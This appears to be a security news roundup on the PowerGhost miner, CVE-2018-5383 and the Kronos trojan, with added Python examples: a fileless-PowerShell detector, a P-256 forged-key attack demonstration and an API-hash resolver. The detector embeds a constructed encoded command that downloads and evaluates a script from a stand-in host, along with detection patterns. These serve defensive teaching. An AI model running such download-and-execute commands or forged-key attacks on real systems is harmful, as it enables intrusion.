PowerGhost Malware

Dubbed PowerGhost, the fileless cryptocurrency-mining malware can quietly embed itself on a single system on a network and then spread to other PCs and servers across the organisation.

Infections begin with exploits or with remote administration tools such as Windows Management Instrumentation (WMI). PowerGhost also relies on fileless techniques so that it can operate discreetly and avoid detection on the network.

Because of this tactic, the PowerGhost miner is never written to the hard drive of the infected machine as a file, which makes it harder to detect with file-based scanning.
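What a defender can actually look for, given that nothing lands on disk, is the execution path itself: PowerShell launched under the WMI provider host (which is where remote WMI execution lands), the switches used to hide a PowerShell payload, and an -EncodedCommand blob that decodes to code fetched and evaluated in memory. The following is an added example, not code from the original page or from any vendor write-up on PowerGhost; the process-creation records, the script behind the encoded command and the 192.0.2.10 address are all constructed for the demonstration, and the switch and keyword lists are generic fileless-PowerShell heuristics rather than PowerGhost-specific indicators.

```python
import base64
import re

# Constructed sample: a script an -EncodedCommand blob might carry
# (192.0.2.10 is a documentation address, not a real host).
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"


def encode_command(script):
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation records (Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + encode_command(CONSTRUCTED_SCRIPT)},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": 'cmd.exe /c powershell -ExecutionPolicy Bypass -Command "IEX (Get-Content x.txt)"'},
]

# Remote WMI execution (Win32_Process.Create) is hosted by WmiPrvSE.exe.
WMI_PARENTS = {"wmiprvse.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Switches typically combined to hide a PowerShell payload from the user and from AV.
EVASION_RE = re.compile(
    r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e|nop(?:rofile)?|"
    r"w(?:indowstyle)?\s+hidden|e(?:xecution)?p(?:olicy)?\s+bypass)\b")
ENC_RE = re.compile(r"(?i)\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")
INMEM_RE = re.compile(r"(?i)downloadstring|invoke-expression|\biex\b|frombase64string")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the reasons this event looks like fileless or WMI-driven execution."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    reasons = []
    if image in SHELLS and parent in WMI_PARENTS:
        reasons.append("PowerShell spawned by %s (remote WMI execution)" % parent)
    if EVASION_RE.search(cmd):
        reasons.append("evasion switches on command line")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command decodes to: " + decoded[:50])
    if INMEM_RE.search(cmd + " " + (decoded or "")):
        reasons.append("downloads or evaluates code in memory (no file dropped)")
    return reasons


def scan(events):
    """Map event index -> reasons, for every event that tripped at least one check."""
    findings = {}
    for i, event in enumerate(events):
        reasons = analyze_event(event)
        if reasons:
            findings[i] = reasons
    return findings


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["CommandLine"][:60])
        for r in reasons:
            print("   -", r)
```

The first record is an ordinary scheduled script and trips nothing; the second is the pattern the paragraph describes (WMI parent, hidden window, encoded command that decodes to a download-and-evaluate one-liner) and trips every check; the third shows that the command-line heuristics still fire when PowerShell is wrapped in cmd.exe. Decoding the blob before matching keywords matters, because the interesting strings never appear in clear text on the command line.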

Source: ZDNet

How do you protect yourself?

Proper security measures must be in place to defend against PowerGhost and similar threats. Patch systems promptly, since the initial foothold relies on exploits; keep endpoint and firewall protection up to date so that layered defences can catch cryptocurrency-mining malware that never touches disk; and watch for unexpected PowerShell or WMI activity and for unexplained CPU load, which is the miner's footprint even when no file is present.

CVE-2018-5383

Researchers at the Israel Institute of Technology have identified a cryptography-related security vulnerability (CVE-2018-5383) in the Bluetooth specification for over-the-air short-range connectivity between devices, concerning two related Bluetooth features: Secure Simple Pairing and LE Secure Connections.

Simply put, the Bluetooth specification recommended but did not require that a device validate the elliptic-curve public key it receives from its peer during pairing, so some vendors' implementations skipped that check, throwing open the door to a man-in-the-middle attack. Without the validation in place, the vulnerability comes into play: an attacker in physical proximity (within roughly 30 meters) can intercept the over-the-air exchange and inject forged pairing messages between two vulnerable Bluetooth devices. This could result in attackers intercepting information flowing between the devices (including two-factor authentication messages), elevation of privilege and/or denial of service.
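The check that was optional is small, and so is the reason it matters. Pairing runs an ECDH exchange on P-256 (the curve LE Secure Connections uses). The affine addition formulas use the curve parameter a but never b, so an implementation that multiplies its private key into whatever point the peer sent will happily compute on a different curve. The attacker in the middle keeps the x coordinate of the genuine key and zeroes y: that point has order 2, so the "shared" result is one of only two attacker-known values, depending on the parity of the victim's private key. The following is an added example written for this page, not code from the researchers or from any Bluetooth stack; the curve constants are the standard P-256 parameters, the private keys and the loop over 100 keys are constructed for the demonstration, and the forged-key construction is the zero-y trick described above.

```python
# P-256 (secp256r1), the curve LE Secure Connections uses for its ECDH exchange.
P = 2**256 - 2**224 + 2**192 + 2**96 - 1
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)
INF = None  # point at infinity


def is_on_curve(pt):
    if pt is INF:
        return False
    x, y = pt
    return 0 <= x < P and 0 <= y < P and (y * y - (x * x * x + A * x + B)) % P == 0


def validate_public_key(pt):
    """The check the spec now requires: coordinates in range, point on the curve,
    not the point at infinity. P-256 has cofactor 1, so no subgroup check is needed."""
    return is_on_curve(pt)


def point_add(p1, p2):
    """Affine addition/doubling. The formulas use A but never B, so an off-curve
    point is silently processed on a different curve with the same A."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:      # p1 == -p2, or doubling a point with y == 0
            return INF
        s = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        s = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (s * s - x1 - x2) % P
    y3 = (s * (x1 - x3) - y1) % P
    return (x3, y3)


def scalar_mult(k, pt):
    """Double-and-add; deliberately performs no validation of pt."""
    result, addend = INF, pt
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def ecdh_shared_point(private_key, peer_public_key, validate):
    """validate=False mirrors an implementation that opted out of the check."""
    if validate and not validate_public_key(peer_public_key):
        raise ValueError("peer public key rejected: not a point on P-256")
    return scalar_mult(private_key, peer_public_key)


def forge_peer_key(genuine_public_key):
    """Attacker keeps x and zeroes y. (x, 0) has order 2 on the curve the
    arithmetic lands on, so k*(x,0) is (x,0) for odd k and infinity for even k."""
    return (genuine_public_key[0], 0)


def attacker_hits(num_keys, forged):
    """How often the guess 'shared point == forged point' is right when the
    victim skips validation, over constructed private keys 1..num_keys."""
    hits = 0
    for priv in range(1, num_keys + 1):
        if ecdh_shared_point(priv, forged, validate=False) == forged:
            hits += 1
    return hits


if __name__ == "__main__":
    genuine = scalar_mult(0x1234567, G)     # constructed victim/peer key pair
    forged = forge_peer_key(genuine)
    print("genuine key valid:", validate_public_key(genuine))
    print("forged key valid:", validate_public_key(forged))
    print("attacker right for", attacker_hits(100, forged), "of 100 private keys")
```

With validation switched off, the attacker's single guess is correct for exactly the odd private keys, i.e. half the time, and the other half the result is the point at infinity, which is equally predictable; either way the attacker no longer needs the victim's private key. With validation on, the forged key is rejected before any multiplication happens, which is the whole of the fix.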

Source: ThreatPost

How do you protect yourself?

Users with Bluetooth-capable devices should install any available updates from device and operating system manufacturers. A patched device validates the public key it receives, and the attack only succeeds when both devices in a pairing are vulnerable, so fixing either side of a connection is enough to stop it.

Kronos Banking Trojan

A new version of the Kronos banking trojan is making the rounds, according to Proofpoint security researchers, who say they’ve identified at least three campaigns spreading a revamped version of this old trojan that had its heyday back in 2014.

The similarities are extensive: the 2018 version uses the same Windows API hashing technique and the same hashes, the same string encryption technique, the same C&C protocol and encryption mechanism, the same webinject format (the Zeus format), and a similar C&C panel file layout.
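"Same API hashing technique and hashes" is a stronger statement than it sounds. A trojan that resolves Windows APIs by hash carries no import table and no API name strings, only 32-bit constants, and it walks a loaded DLL's export table comparing the hash of each name against the constant it wants. An analyst reverses that by precomputing the same hash over every export of interest and matching the constants pulled from a sample; two samples with identical constants therefore share both the algorithm and the set of APIs they call. The following is an added example, not Proofpoint's or Kronos's code: the ROR-13 hash is the generic shape used by many shellcode loaders and is an assumption here (the page does not say which algorithm Kronos uses), and the export list and the two samples' constant lists are constructed for the demonstration.

```python
# Constructed subset of export names a banking trojan typically resolves at runtime.
EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateFileW", "WriteFile", "CreateRemoteThread", "WriteProcessMemory",
    "InternetOpenA", "InternetConnectA", "HttpSendRequestA",
    "connect", "send", "recv",
]


def api_hash(name):
    """Illustrative ROR-13 hash over the ASCII export name.
    Assumption: NOT the Kronos algorithm, which the page does not specify."""
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + byte) & 0xFFFFFFFF
    return h


def loader_resolve(wanted_hash, export_table):
    """Malware side: walk the export table and return the name whose hash matches.
    No API name string needs to exist anywhere in the binary."""
    for name in export_table:
        if api_hash(name) == wanted_hash:
            return name
    return None


def build_lookup(names):
    """Analyst side: precompute hash -> name for every export of interest."""
    return {api_hash(n): n for n in names}


def resolve(hash_constants, lookup):
    """Map the 32-bit constants pulled from a sample back to API names."""
    return [lookup.get(h, "<unknown 0x%08x>" % h) for h in hash_constants]


def shared_imports(sample_a, sample_b, lookup):
    """Names behind the hash constants two samples have in common."""
    return sorted(lookup.get(h, "<unknown 0x%08x>" % h)
                  for h in set(sample_a) & set(sample_b))


# Constructed constant lists standing in for what one would extract from two samples.
SAMPLE_2014 = [api_hash(n) for n in ("LoadLibraryA", "GetProcAddress", "VirtualAlloc",
                                     "WriteProcessMemory", "InternetOpenA")]
SAMPLE_2018 = SAMPLE_2014 + [api_hash("connect")]

if __name__ == "__main__":
    lookup = build_lookup(EXPORTS)
    print("2018 sample resolves to:", resolve(SAMPLE_2018, lookup))
    print("shared with 2014 sample:", shared_imports(SAMPLE_2014, SAMPLE_2018, lookup))
```

The lookup table is the analyst's lever: once the algorithm is known, every constant in a new sample resolves in one dictionary hit, and an unknown constant is itself a finding, either a new import or a changed algorithm.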

But the two versions are not identical. The main difference is that the 2018 edition hosts its command-and-control (C&C) panels on Tor.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against the Kronos banking trojan and similar threats. Keep endpoint security up to date so that layered defences can stop the trojan before it reaches the browser, where its Zeus-format webinjects operate, and block or alert on outbound Tor traffic from endpoints that have no business using it, since that is how the new version reaches its C&C panels.